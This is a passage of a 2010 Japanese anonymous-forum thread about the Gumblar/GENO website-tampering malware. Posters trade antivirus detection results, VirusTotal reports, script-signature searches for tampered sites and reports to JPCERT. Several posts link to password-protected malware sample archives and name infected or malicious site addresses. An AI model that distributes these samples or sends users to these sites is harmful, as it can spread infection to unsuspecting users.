アクセス地を地道に探し出すんじゃwwwww
http://blog.trendmicro.co.jp/archives/3317
にイラスト有るけど
FTPアカウント情報を集めて攻撃者が地道に改ざんするみたいだから
FTPを送られる側と最初にアタックしてきた奴を探すんじゃないかなw
633名無しさん@お腹いっぱい。:2010/01/09(土) 02:11:08
>>632
地道にっつってもその辺は自動化されてると思うよ。
634名無しさん@お腹いっぱい。:2010/01/09(土) 02:14:27
Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt

インシデントの届出
ttps://form.jpcert.or.jp/

記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
結構適当でいいらしい。
635名無しさん@お腹いっぱい。:2010/01/09(土) 02:30:41
>>570
sysgif32が登録されないパターンもあるっぽいから油断禁物
636名無しさん@お腹いっぱい。:2010/01/09(土) 03:02:56
>>557
あるとまずいもの
>C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

プログラムフォルダに見当たらなかったので、
テキストファイルをつくって、名前変更してsiszyd32.exeにしたら、削除できなくなって困ったw
637名無しさん@お腹いっぱい。:2010/01/09(土) 03:41:29
なにその面白プレイ
638名無しさん@お腹いっぱい。:2010/01/09(土) 11:00:07
削除できないと困るのか?
639名無しさん@お腹いっぱい。:2010/01/09(土) 14:37:48
>>287
http://www.google.co.jp/search?hl=ja&q=%3Cscript%3E%2F*GNU+GPL*%2Ftry%7Bwindow.onload+%3D+function%28%29%7Bvar&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
640名無しさん@お腹いっぱい。:2010/01/09(土) 14:39:38
>>635マジか
他に確認方法ある?ちなみにavast使ってます
641名無しさん@お腹いっぱい。:2010/01/09(土) 14:41:55
http://www.google.co.jp/search?hl=ja&num=50&q=%3Cscript%3E%2F*LGPL*%2F+try%7B+window.onload+%3D+function%28%29%7Bvar&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
642名無しさん@お腹いっぱい。:2010/01/09(土) 16:26:36
ってか、確実に確認できる方法が確立してれば
ここまでの騒ぎにはならないわけで。

判明してる方法でわからないのであれば
あとは自分が出来る限りの回避策をとって運任せ。

それか当分ネットから離れるかのどっちかだw
643名無しさん@お腹いっぱい。:2010/01/09(土) 16:28:33
>>638
「他のプログラムが使用していて削除できません」
とかウイルスがいるような気がするだろw
644名無しさん@お腹いっぱい。:2010/01/09(土) 16:32:22
これ、三糞とか2NNとかコソアンとかが感染してたら
さらにどえらい騒ぎになるんだろうなあ。
645名無しさん@お腹いっぱい。:2010/01/09(土) 19:12:21
>>574
WindowsPEを使えば見えないファイルも見えるはず。
646名無しさん@お腹いっぱい。:2010/01/09(土) 20:34:19
【Geno】 ガンブラーウィルス  ヤフーも被害に  昨年10月27日〜今年1月8日
http://tsushima.2ch.net/test/read.cgi/news/1263036497/
647名無しさん@お腹いっぱい。:2010/01/09(土) 20:57:50
p://mangakakouze●com/

新型きますた
648名無しさん@お腹いっぱい。:2010/01/09(土) 21:07:13
新型か〜
649名無しさん@お腹いっぱい。:2010/01/09(土) 21:18:08
>>647

カスペルスキーさんは検知してくれました


Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

p://mangakakouze●com/

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:17:03
Kaspersky Internet Security 2010
650名無しさん@お腹いっぱい。:2010/01/09(土) 21:39:19
>>647
ここと同種だったはず


http://pc11.2ch.net/test/read.cgi/sec/1262054865/392

392 :名無しさん@お腹いっぱい。:2010/01/01(金) 15:17:02
片桐はいり4倍速の公式サイトで動画再生したら
ウィルスアラートでまくって
その後、PCの動作がおかしい

誰か検証してくだされ
651名無しさん@お腹いっぱい。:2010/01/09(土) 21:47:17
>>650
MSE使用者の馬鹿さ加減がよく分かるなw
652名無しさん@お腹いっぱい。:2010/01/09(土) 21:53:47
Yahoo占い、運が悪いと新型PCウイルス「ガンブラー」に感染するという斬新な占い機能を提供
http://tsushima.2ch.net/test/read.cgi/news/1263040426/
653名無しさん@お腹いっぱい。:2010/01/09(土) 21:56:00
>>652
>>646
重複側貼られても・・・
654名無しさん@お腹いっぱい。:2010/01/09(土) 23:03:55
>>647
ノートン先生は反応しないな
655名無しさん@お腹いっぱい。:2010/01/09(土) 23:11:59
virusutotalでは検出してるけどな
http://www.virustotal.com/jp/analisis/ee1f8bb4ea5f1d4615b33345c4ed4a7fd1844f3e2ff38c3b3f7dc07287fc4159-1263041250
スクリプトに反応しなくても防いではくれるから問題ないだろうけど
656名無しさん@お腹いっぱい。:2010/01/09(土) 23:13:12
またうちの子は検出してくれる!!スゴイ合戦してるのか
657名無しさん@お腹いっぱい。:2010/01/09(土) 23:15:58
重要なことだろ
スクリプトだけで判断するやつが多いのは問題だが
それもどうでも良いわけではない
658名無しさん@お腹いっぱい。:2010/01/09(土) 23:17:35
元を防げよ防いでるならどうでもいい
659名無しさん@お腹いっぱい。:2010/01/09(土) 23:19:11
防ぐのは重要だが感染していることに気づくのも必要なんだよ
気づかないからそのままな人もいる
660名無しさん@お腹いっぱい。:2010/01/09(土) 23:21:23
当たり前のことだがな
馬鹿もいるから仕方ない
661名無しさん@お腹いっぱい。:2010/01/10(日) 01:07:06
盗んだID販売目的か 感染広がる「ガンブラー」
http://tsushima.2ch.net/test/read.cgi/news/1263041732/
662名無しさん@お腹いっぱい。:2010/01/10(日) 01:31:55
Windows使いでなくてよかったよ
663名無しさん@お腹いっぱい。:2010/01/10(日) 01:57:57
やはり有料版かね。
664名無しさん@お腹いっぱい。:2010/01/10(日) 02:46:52
p://www●mag-x●com/

最新型きますた
665名無しさん@お腹いっぱい。:2010/01/10(日) 04:07:30
>>664
実験用VMでアクセスしたら
avastさんが叩いてくれました
666名無しさん@お腹いっぱい。:2010/01/10(日) 05:24:09
カスペも反応した
まぁ、新型だとしてもセキュリティソフトで対処できる程度の応用なわけだ
667名無しさん@お腹いっぱい。:2010/01/10(日) 05:37:18
>>666
/*LGPL*/は何パターンかのスクリプトがあるようだから
必ずしも安心できないぞ

結果: 5/40
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1263068932
結果: 3/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1263068989
結果: 10/41
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1263069028
668名無しさん@お腹いっぱい。:2010/01/10(日) 05:44:29
怖いのはメジャーなサイトでも安心できないという事
これに尽きる
例えば、noscriptやそれに近い方法でJSを止めてる場合は確かに安全だが
JSを許可しているサイトが後々、感染する可能性があるからな
669名無しさん@お腹いっぱい。:2010/01/10(日) 10:06:59
JRとかローソンとか普通は見てしまうからなw
670名無しさん@お腹いっぱい。:2010/01/10(日) 10:09:42
yahooが感染したとしてyahoo.co.jpを許可してたら感染しちゃうのか?
誘導するスクリプトを許可してなければ大丈夫だと理解してるけどどうなの?
671名無しさん@お腹いっぱい。:2010/01/10(日) 10:10:25
カスペはLGPLより前の古いスクリプトは検出しないけどな
672名無しさん@お腹いっぱい。:2010/01/10(日) 11:21:14
はいはい
673名無しさん@お腹いっぱい。:2010/01/10(日) 11:24:47
馬鹿信者登場か
674名無しさん@お腹いっぱい。:2010/01/10(日) 14:19:45
>>670
わからんが、yahooは占いページか何かが感染してたぞ
675名無しさん@お腹いっぱい。:2010/01/10(日) 14:24:23
>>670
は私も知りたい。
その場合、yahooから感染サイトへリダイレクトされちゃうけど、
リダイレクト先は許可してないから、攻撃はできないって理解で桶?

>>674
それ意味が違うと思う。
ただyahooの占いサイトの場合、過去ログをたどった先の占いスクリプトか
何かが感染されてたみたいなので、これ、感染スクリプトをもらったままで
アップしちゃっただけなのか、当該サイト管理人のPCが汚染されてたのか、
どっちかはっきりして欲しいと思ったよ。
676名無しさん@お腹いっぱい。:2010/01/10(日) 15:46:53
BBセキュリティが感染してたらおもろかったのに
677名無しさん@お腹いっぱい。:2010/01/10(日) 16:00:58
 
678名無しさん@お腹いっぱい。:2010/01/10(日) 16:47:12
esetはGNU GPLの頃から検知しないな
679名無しさん@お腹いっぱい。:2010/01/10(日) 16:51:34
esetはしてるだろ
嘘は言うなよ
680名無しさん@お腹いっぱい。:2010/01/10(日) 16:52:50
気にくわないからって嘘はやめてくれ
文句言うならカスペに言えよ
681名無しさん@お腹いっぱい。:2010/01/10(日) 17:40:49
/* BSD なんだこれ
682名無しさん@お腹いっぱい。:2010/01/10(日) 17:41:48
url プリーズ
683名無しさん@お腹いっぱい。:2010/01/10(日) 18:07:22
馬鹿信者登場か
684名無しさん@お腹いっぱい。:2010/01/10(日) 18:21:07
yahooが被害にあったのは何日の何時頃?
とりあえずyahooのトップページとメールのページはやられてない?
685名無しさん@お腹いっぱい。:2010/01/10(日) 18:21:41
>>684
>とりあえずyahooのトップページとメールのページはやられてない?
無問題
686名無しさん@お腹いっぱい。:2010/01/10(日) 18:47:19
最近毎日完全スキャン
687名無しさん@お腹いっぱい。:2010/01/10(日) 18:48:23
完全スキャンとかダルくね?
脆弱性を塞いじゃえばいいのに。
688名無しさん@お腹いっぱい。:2010/01/10(日) 23:00:26
js使わないと見られないような企業サイトウザい
689名無しさん@お腹いっぱい。:2010/01/10(日) 23:07:40
一番の問題はそこの気がする。

javascript無いと見れない・機能しないサイト多すぎ
flash無いと見れない・機能しないサイト多すぎ

そして、javascriptとflashに頼る限り、閲覧側は脆弱性から逃れられない
690名無しさん@お腹いっぱい。:2010/01/10(日) 23:07:50
なんか大手のサイトしか回ってないのに感染した
yahooかmsnって他にも感染してる?
691名無しさん@お腹いっぱい。:2010/01/10(日) 23:19:02
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113
サイト改ざん(2)ハウス食品、民主党、ローソンなど被害サイト23の改ざん状況
692名無しさん@お腹いっぱい。:2010/01/10(日) 23:31:02
>>691
こいつここにいるだろ
693名無しさん@お腹いっぱい。:2010/01/11(月) 20:24:22
何だか、ちょっとしたパニックだな。
いや、完全にパニックか。
いよいよ、世界的にJavaスクリプトとFlashを捨てる時が来たか!!
そん時は、新しい亜種が別経路で入り込んで来るんだろうけどなー。
694名無しさん@お腹いっぱい。:2010/01/11(月) 20:52:31
これって世界中でこんな感じなの?それとも日本だけ?
695名無しさん@お腹いっぱい。:2010/01/11(月) 21:23:51
ぐぐればわかる
696名無しさん@お腹いっぱい。:2010/01/11(月) 21:25:19
新ウイルスGumblar(ガンブラー)について
http://www.mcafee.com/japan/security/gumblar.asp

iframe使ったGumblarって何よw
697名無しさん@お腹いっぱい。:2010/01/11(月) 21:31:24
>>696
最終的にはiframeで危険なpdfやjavaを含むページを開く
698名無しさん@お腹いっぱい。:2010/01/11(月) 21:56:33
https://www.ccc.go.jp/detail/web/index.html
無料のMcAfee Security Scanを外すorz

McAfeeを外すのは、使用中のセキュリティーソフトとバッティングしてしまい
動作不良を起こすからなんだお(^0^)/
McAfeeをいらない子扱いにするなおorz
699名無しさん@お腹いっぱい。:2010/01/11(月) 22:00:47
>>697
>ユーザが不正にiframeを埋め込まれたWebサイトを閲覧することから始まります
どこのことよ

>次にIframeにより難読化されたJavaScriptが実行され
んなもんあったけ
700名無しさん@お腹いっぱい。:2010/01/11(月) 22:38:50
あるよ。1段目から落ちてくる
701名無しさん@お腹いっぱい。:2010/01/11(月) 23:07:42
>>700
コードよろ
702名無しさん@お腹いっぱい。:2010/01/11(月) 23:21:03
>>701
1つだけだけど、2nd のスクリプト
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=572
pass: virus
最小サイズに足りなかったので、LGPLスクリプト足しといた
703名無しさん@お腹いっぱい。:2010/01/11(月) 23:43:38
>>702
>>699はさ、日本語的には
始めに見たHPにiframeがあって
iframeがJavaScriptを実行するという事でしょ
704名無しさん@お腹いっぱい。:2010/01/11(月) 23:46:23
>>703
そこまで追求しなくてもおkだろww
「一部語弊がありました」で済む話
705名無しさん@お腹いっぱい。:2010/01/11(月) 23:47:29
おー、下しか読んでなかったw
706名無しさん@お腹いっぱい。:2010/01/12(火) 00:08:55
ガンブラー新型きますた

194 名前:名無しさん@お腹いっぱい。:2010/01/11(月) 22:01:15
ttp://www.dotup.org/uploda/www.dotup.org552022.zip.html
pass:Virus

195 名前:名無しさん@お腹いっぱい。:2010/01/11(月) 22:06:50
>>194
ttp://www.virustotal.com/analisis/60d916c851c6cc72e6de9d96b882fda284fbe37fea06ed3f502f9c96ae8abfe1-1263215078
ttp://www.virustotal.com/analisis/69b2c803e40c546b715d7f3eb647ae191b838dc13bdfbc7b8a65045135c14018-1263215072
707名無しさん@お腹いっぱい。:2010/01/12(火) 00:33:49
http://www.mcafee.com/japan/security/gumblar.asp
↑ここで対応していると言っているものは
http://pc11.2ch.net/test/read.cgi/sec/1258817697/24
↑ここでMcAfee Labs, Aylesbury, UKが解析したものであって
日本のAVERTは、今でもこれを危険なファイルではないとしている

去年の暮れ以降送った検体にも対応する気配もないし
スーパーショボボボ(´(´・(´・ω・`)・`)`)────ンだわ
708名無しさん@お腹いっぱい。:2010/01/12(火) 07:21:00
メールで送るくらいならWebImmuneにアップしたほうが対応早いぞ
709名無しさん@お腹いっぱい。:2010/01/12(火) 12:53:13
ウイルス「ガンブラー」暴れ杉ワロタwお前ら一刻も早くgredセキュリティサービスでURLチェックしろ!
http://tsushima.2ch.net/test/read.cgi/news/1263250962/
710名無しさん@お腹いっぱい。:2010/01/12(火) 13:15:00
なんでN速厨って本スレではとっくに出尽くした話を
わざわざN速にリンク貼ってするんだろうな
711名無しさん@お腹いっぱい。:2010/01/12(火) 13:20:15
厨だからさ
712名無しさん@お腹いっぱい。:2010/01/12(火) 14:07:30
自分たちの情報が最新だって思い込んでるんだね
713名無しさん@お腹いっぱい。:2010/01/12(火) 14:52:58
狙い撃ちwwワロタ
714名無しさん@お腹いっぱい。:2010/01/12(火) 15:12:07
Gumblar対策を再チェック 基本的な作業で感染防止を(ITmedia News)
http://headlines.yahoo.co.jp/hl?a=20100112-00000001-zdn_n-sci
715名無しさん@お腹いっぱい。:2010/01/12(火) 17:33:32
>>708
WebImmuneは登録する必要があるので
私のセキュリティポリシーに反するのだー
716名無しさん@お腹いっぱい。:2010/01/12(火) 18:21:56
http://www.google.co.jp/search?hl=ja&num=50&q=%3Cscript%3E%2F*LGPL*%2F+try%7B+window.onload+%3D+function%28%29%7Bvar+-co.jp&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
717名無しさん@お腹いっぱい。:2010/01/12(火) 19:17:45
最近、騒ぎの中心が8080なせいでGENOが紛れ気味なんだが
活動再会したGENOは以前との違いとかあるのか?
タグの挿入場所は変わらず<BODY>の直前?
718名無しさん@お腹いっぱい。:2010/01/12(火) 19:37:08
>>715
メルアドだけじゃん…。
719名無しさん@お腹いっぱい。:2010/01/13(水) 01:59:13
次スレからスレタイにGumblarを入れるかしたほうがいいかもね
720名無しさん@お腹いっぱい。:2010/01/13(水) 02:04:43
>>393
> GENO(Gumblar)ウイルススレ ★24
721名無しさん@お腹いっぱい。:2010/01/13(水) 02:24:11
当初みてたけどまだやってるんすかwww
今GENOのぺーじでカートに入れてみたけどなんともない
genoチェッカでも反応無しみたい。GENOのサイトではもう駆除されたの?
722名無しさん@お腹いっぱい。:2010/01/13(水) 03:16:13
>>721
タイムマシンで過去からお越しですか?
723名無しさん@お腹いっぱい。:2010/01/13(水) 06:04:28
genoチェッカーとか懐かしいなw
ページ作った人はどうしてるんだろう
724名無しさん@お腹いっぱい。:2010/01/13(水) 13:44:00
まだいるんじゃねーの?
PLなんとかってIDでいたぞ
725名無しさん@お腹いっぱい。:2010/01/13(水) 13:48:39
tp://genochk.crz.jp/
726名無しさん@お腹いっぱい。:2010/01/13(水) 21:21:05
http://labs-uploader.sabaitiba.com/virus/download/1263384000.7z
pass: virus

ガンブラー系のまとめきますた。
727名無しさん@お腹いっぱい。:2010/01/13(水) 21:57:13
>>696=>>699
釣り?それとも今北産業の人?
昨年春に現れたその時から感染経路はiframeだったしJavaScriptだったし
難読化が出てきたのは昨年夏。
過去ログリスト書いてあるんだから読んでこい。
728名無しさん@お腹いっぱい。:2010/01/13(水) 22:51:18
難読化は最初からされてなかったっけ?
729名無しさん@お腹いっぱい。:2010/01/13(水) 23:07:03
>>727
699-をよく読め
730名無しさん@お腹いっぱい。:2010/01/14(木) 00:26:39
avastには引っかからない?
731名無しさん@お腹いっぱい。:2010/01/14(木) 00:41:44
>>730
>>726の検体を送付したら反応するようになると思う。
732名無しさん@お腹いっぱい。:2010/01/14(木) 00:44:55
>>730
反応する件
733名無しさん@お腹いっぱい。:2010/01/14(木) 04:48:32
さっきあるサイト開いたらavastでJS:Illredir-C検出されたんだけどJSオフなら見ても大丈夫かな。
できたら管理者に伝えてやりたいとこなんだけど
見つけてどういうもんか調べてる最中だから下手に踏めない。
734名無しさん@お腹いっぱい。:2010/01/14(木) 05:39:48
ttp://www.matsutake-gr.com/shimamura/
反応しますか?
735名無しさん@お腹いっぱい。:2010/01/14(木) 06:08:10
>>734
/i と .jsファイルが*GNU GPL*
736名無しさん@お腹いっぱい。:2010/01/14(木) 08:04:38 BE:2829863-2BP(1236)
>>734
とりあえずkagoya.netとJPCERT/CCに報告した。
737名無しさん@お腹いっぱい。:2010/01/14(木) 09:27:32
起動からしかjs切れない黒目終わってるなw
738名無しさん@お腹いっぱい。:2010/01/14(木) 14:12:14
ガンブラーで三井住友カード被害!ほんと、どえらい
http://tsushima.2ch.net/test/read.cgi/news/1263444584/
739名無しさん@お腹いっぱい。:2010/01/14(木) 16:10:55
新型GENOウイルス

ttp://www.virustotal.com/jp/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503

うんこMSEは未対応
740名無しさん@お腹いっぱい。:2010/01/14(木) 16:48:41
>>739
その結果ってマカフィーもカスペもスも糞じゃねーかよ
741名無しさん@お腹いっぱい。:2010/01/14(木) 16:54:53
志村ーファイル受理した日付ー日付ー
742名無しさん@お腹いっぱい。:2010/01/14(木) 17:10:47
>>739
マルチポストするよなネタでもないわな
743名無しさん@お腹いっぱい。:2010/01/14(木) 18:12:07
>>739
>Infostealer.Kenzero
アダルトゲームのsetup.exeを装い、個人情報を晒すトロイの木馬
ttp://internet.watch.impress.co.jp/docs/news/20091201_332607.html
「Infostealer.Kenzero」は、ファイル共有ソフト「Share」のネットワーク上で、
アダルトゲームの偽のインストールファイル(setup.exe)として流通しており、
複数のゲームタイトルにこのファイルが含まれることが確認されたという。

ダウソ厨専用。Gumblarとは全く関係がない。
http://hideyoshi.2ch.net/download/
744名無しさん@お腹いっぱい。:2010/01/14(木) 18:17:13
>>743
株式会社ロマンシング(笑 ですね、わかります
745名無しさん@お腹いっぱい。:2010/01/14(木) 20:27:04
エロゲーやってる末期池沼にPCなんざイラネ―わなw
746名無しさん@お腹いっぱい。:2010/01/15(金) 01:34:30
新型GENOウイルス

ttp://www.virustotal.com/jp/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503

うんこNODは未対応
747名無しさん@お腹いっぱい。:2010/01/15(金) 01:38:26
それ>>739と同じだから何度も貼らなくていいよ
748名無しさん@お腹いっぱい。:2010/01/15(金) 01:53:00
新型GENOウイルス

ttp://www.virustotal.com/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503


セキュリティZEROは完全対応
749名無しさん@お腹いっぱい。:2010/01/15(金) 02:30:11
ダウソ板に帰れよ
750名無しさん@お腹いっぱい。:2010/01/15(金) 17:07:08
エロゲに仕込む発想は日本人臭い
751名無しさん@お腹いっぱい。:2010/01/15(金) 19:30:55
そもそもShareって時点でお察し
752名無しさん@お腹いっぱい。:2010/01/15(金) 19:37:22
>>748

ZERO って2009の秋すぎから急速に性能上げたな

どこの調査でも検出率を含めた総合評価はかなり良い

毎年さんざん酷評していた某PC誌もこの現象には驚いてたな

新アンチスキャナの性能が相当良いのかな?
753名無しさん@お腹いっぱい。:2010/01/15(金) 21:26:56
執拗にWindows7対応版にアップグレードして下さい!
のダイアログ出してくるのはうざいけどな
メール送れば対応してくれるらしいが
754名無しさん@お腹いっぱい。:2010/01/15(金) 23:53:42
>急速に性能上げたな
当社比()笑
755名無しさん@お腹いっぱい。:2010/01/15(金) 23:58:04
紙と現実のギャップ()笑
756名無しさん@お腹いっぱい。:2010/01/18(月) 06:56:42
 
757名無しさん@お腹いっぱい。:2010/01/19(火) 09:34:24
bタグ付きワラタ
これでアンチウイルス系は再定義かねぇ
758名無しさん@お腹いっぱい。:2010/01/21(木) 00:50:22
プニルでjsなんかを全部切っておけよ
759名無しさん@お腹いっぱい。:2010/01/22(金) 05:44:25
 
760名無しさん@お腹いっぱい。:2010/01/22(金) 08:35:21
また火狐野郎がなんかいっちゃってたのか
MACつかえ
761名無しさん@お腹いっぱい。:2010/01/22(金) 10:07:44
数値→文字列の変換するだけでメモリリーク起こすMACなんか・・・・
Linux最強!
762名無しさん@お腹いっぱい。:2010/01/22(金) 19:00:13
>>760-761
一般人には相手にされないって早く気付いたほうがよいぞ
763名無しさん@お腹いっぱい。:2010/01/22(金) 19:21:48
火狐野郎も相手にされないという
764名無しさん@お腹いっぱい。:2010/01/22(金) 19:33:44
ゲームのブラウザ最強ですね
765名無しさん@お腹いっぱい。:2010/01/22(金) 21:38:27
IEパッチ出たと思ったら
gumblarも新型になったみたいですよ

自称マジョリティの方は対策頑張ってくださいな
766名無しさん@お腹いっぱい。:2010/01/22(金) 22:00:13
メジャーの方が楽だよ。
あらゆることでトラブルに巻き込まれる奴が必ず居るから
簡単に情報が入る。
767名無しさん@お腹いっぱい。:2010/01/22(金) 22:15:58
挿入されるコードが変わっただけだろ。
導かれる処理とか突かれる脆弱性、回避策が全く変わっていないのに新型とかいうなよ。
768名無しさん@お腹いっぱい。:2010/01/22(金) 22:28:35
だな
foxitの情報がほとんど出てこない
769名無しさん@お腹いっぱい。:2010/01/23(土) 00:05:34
だねえ。メジャーなものは要望やウイルスが多くなるから不具合も多いが、
その分、暇な人が解決策を強引にでも作るからそれにのるだけでいい。
マイナーなものだと解決策がないどころか、気付かないことのほうが多い。
770名無しさん@お腹いっぱい。:2010/01/23(土) 00:12:29
foxitユーザーに朗報です
未だに修正されていないアレゲな脆弱性有り・・・
771名無しさん@お腹いっぱい。:2010/01/23(土) 05:07:33
>>770
どこ情報?
772名無しさん@お腹いっぱい。:2010/01/23(土) 15:40:27
そういや3.6はどうなんだろ。まだ様子見してるが
773名無しさん@お腹いっぱい。:2010/01/23(土) 20:19:39
入れたけど3.5とそれほど変わらん。拡張とかはお察し。
あとプラグインチェックは何の役にも立たないクソ機能。
774名無しさん@お腹いっぱい。:2010/01/24(日) 04:33:16
俺も真っ赤になって質問するぞ・・・・とりあえず、詳しいやつ助けてくれ・・・・
どうなったらアウト何だよおおおおおおおおおおおおおおおおおおおおおお
もう情報漏れてんのか、再起動したらもうご愁傷様なのか、おれの
775名無しさん@お腹いっぱい。:2010/01/24(日) 04:36:37
>>774
すみません、誤爆しました。
776名無しさん@お腹いっぱい。:2010/01/24(日) 14:30:02
>>774
アウト
777名無しさん@お腹いっぱい。:2010/01/25(月) 00:02:06
>>774
vip板の風俗嬢がなんからかんたらって沢山wが付いたスレの誤爆でしょ
778名無しさん@お腹いっぱい。:2010/01/25(月) 01:16:38
>>774
ご愁傷様ですね・・・
779名無しさん@お腹いっぱい。:2010/01/25(月) 02:20:03
JS DLOADR.VTGっていうウイルスに感染したっぽいんだけど
GENOの亜種かな?
ウイルスバスターでは対処できないみたいなんだけど・・・
780名無しさん@お腹いっぱい。:2010/01/25(月) 07:04:00
じゃぁノートンとかで。
781名無しさん@お腹いっぱい。:2010/01/25(月) 20:13:24
今カスペのオンラインスキャンがメンテ中だからniftyのカスペスキャンやろうとしてたんだけど
1回目のアドオンの許可では承認(認証だったかな?)されたkaspersky labのアドオンだったけど
2回目に承認されてないkaspersky online scanner pro gui partってのが出てきた。実行したけど・・・

ググッたらkaspersky online scanner proがトロイとして検出されたっていってる人もいたけど俺のPCもうやられたのかなwwww
782名無しさん@お腹いっぱい。:2010/01/26(火) 12:14:37
ググって出てきた記事
2007/10/12って出てるから
大丈夫だろ
ニフティがウイルスに感染してるという話も聞かないしな
783名無しさん@お腹いっぱい。:2010/01/26(火) 22:17:06
 
784名無しさん@お腹いっぱい。:2010/01/27(水) 19:15:58
さっきaviraが「C\WINDOWS\lfd4_tmp.#32」がトロイだと騒いでた
検索してみるとGENOウイルスの亜種ってことなんだが、実際はどうなんでしょうか?
785名無しさん@お腹いっぱい。:2010/01/27(水) 19:54:28
とっとと削除しろよ
786名無しさん@お腹いっぱい。:2010/01/27(水) 21:47:40
admachikoって何よ
787名無しさん@お腹いっぱい。:2010/01/27(水) 21:50:59
ともだちんこ
788ノートン太郎くん:2010/01/29(金) 22:56:13
●K7コンピューティング最高技術責任者の甘いマスク公開
http://www.k7computing.com/images/k7mt/andi.jpg
  ノ⌒)(⌒ヽ
(((´瑞,人_星 `)
●2007年8月 ZERO 既にワイルドリストは大差なし
http://itpro.nikkeibp.co.jp/article/COLUMN/20071215/289572/zu02s.jpg
(  )´・ω・`(  )  
新型GENO病毒
安全特警は完全地支持
★  ノ ⊂ ) )) 
https://zeustracker.abuse.ch/monitor.php
 \( ヽつ 〈   
https://zeustracker.abuse.ch/monitor.php?browse=binaries
  (((_)~ヽ_,,)  
http://virscan.org/report/cc90813187e20d55b5ec1f1af34ce73e.html
789名無しさん@お腹いっぱい。:2010/01/31(日) 10:46:38
http://x28go.s12.xrea.com/terumi/vsign.jpg
790名無しさん@お腹いっぱい。:2010/01/31(日) 23:59:02
 
791名無しさん@お腹いっぱい。:2010/02/01(月) 01:25:49
見たことあると思ったらTERUMIか
792名無しさん@お腹いっぱい。:2010/02/01(月) 01:29:48
793名無しさん@お腹いっぱい。:2010/02/01(月) 07:40:53
懐かしいなw
794名無しさん@お腹いっぱい。:2010/02/08(月) 22:28:52
てst
795名無しさん@お腹いっぱい。:2010/02/12(金) 23:10:46
796名無しさん@お腹いっぱい。:2010/02/22(月) 17:00:48
 
797名無しさん@お腹いっぱい。:2010/03/03(水) 08:45:34
【産経抄】3月3日
2010.3.3 02:44
ネットの巨大掲示板「2ちゃんねる」のサーバーがダウンし、日韓のネットユーザーたちを熱くさせている。
韓国から大規模なサイバー攻撃を受けたためらしく、きのう午後もアクセスしようとしたがだめだった。

 ▼原因は、バンクーバー五輪で金メダルを獲得した金妍児選手を批判する意見が、掲示板上に多数寄せられたためだとか。
小欄も2ちゃんねるの掲示板には、しょっちゅう悪口を書かれているので、助っ人する義理はないのだが、由々しき事態である。

 ▼ネットの匿名掲示板は、好き勝手な意見を書けるのが売りだが、受け狙いのあまり過激に走りやすい。
それを真に受けて、サイバー攻撃を仕掛けるとは韓国のネットユーザーも大人げない。

 ▼大人げないどころか謀略のにおいさえする。サイバー攻撃が始まった1日は、日本統治時代に独立を求めて起きた「3・1独立運動」記念日。
毎年、大統領が演説することになっているが、李明博大統領は就任以来、未来志向の日韓関係を訴え続けている。日韓併合100年の今年も「過去にとらわれない」と強調した。

 ▼2ちゃんねる風に書けば、「3・1」に対日批判を繰り返していた盧武鉉前大統領の支持者は、これが気にくわない。
今回の事件は、ささいな理由で韓国のネットユーザーをあおり、日本の「嫌韓」派に火をつけることによって両国の離反を狙ったテロ行為そのものだ。

 ▼2ちゃんねるは政治も大好きだ。民主党の小沢一郎幹事長の一挙手一投足をあげつらったコメントは天文学的数字にのぼる。
いつもなら民主党議員側に違法献金したとして北海道教職員組合幹部が逮捕された事件も格好のネタになっていたはずだ。実は民主党もサーバーダウンを喜んでいたりして。
798名無しさん@お腹いっぱい。:2010/03/03(水) 17:58:42
>>797
産経もいよいよ落ちるところまで落ちた感があるな
799名無しさん@お腹いっぱい。:2010/03/04(木) 13:19:29
GENOウイルスのせいです
800名無しさん@お腹いっぱい。:2010/03/04(木) 19:51:14
           , ‐ 、 - ― 、_ .-―、.、             _
          /: /: : :/ /: : :\: : :ヽ ヽ     r‐、   __| |__
.        / : /:_:_:ィ :.|/: :i : : : .ヽ: :ヽ : i    |  |   |__  __|         / ̄ ̄ ̄\
        |: : /:/\i :/|: : ii : :.i : : :| : |.: |    |  |       | |   ____ |  r-‐-、  |
       |: :|/fイi.}:/ .!: /ヽ i : : /|イvリ    |  |       | |   |____|  `‐‐' ,.-‐'′/
        |:/ ゞ-'   fイハ/i |:// |       !  {  / ̄ ̄  `ヽ、          |_r‐'′
        |∧   ,、_ ヾつ'oi//: ノ      |  !  |  (二} iヽノ           r-、
        |:::ヽ_ !   ノ  / : : /        !___}  `ー‐---'′            └┘
           ヽ|::i : r―∠: : /
801名無しさん@お腹いっぱい。:2010/03/07(日) 10:36:02
☆☆トロイの木馬☆☆5台目 (522)
http://pc11.2ch.net/test/read.cgi/sec/1215569127/
にも書いたけど
ttp://irving-maichi.jp/
にトロイの木馬が仕掛けられている可能性あり
java scriptで自動でダウンロードされ
感染するかもしれませんよ
802名無しさん@お腹いっぱい。:2010/03/07(日) 10:49:42
>>801
2010/03/07 10:46:37 感染しています トロイの木馬 Trojan-Downloader.JS.Pegel.b Webサイト ttp://irving-maichi●jp/common/ flash.js アプリケーションを仮想実行中です 高
2010/03/07 10:46:37 感染しています トロイの木馬 Trojan-Downloader.JS.Pegel.b Webサイト ttp://irving-maichi●jp/common/ right_click_prohibition.js アプリケーションを仮想実行中です 高
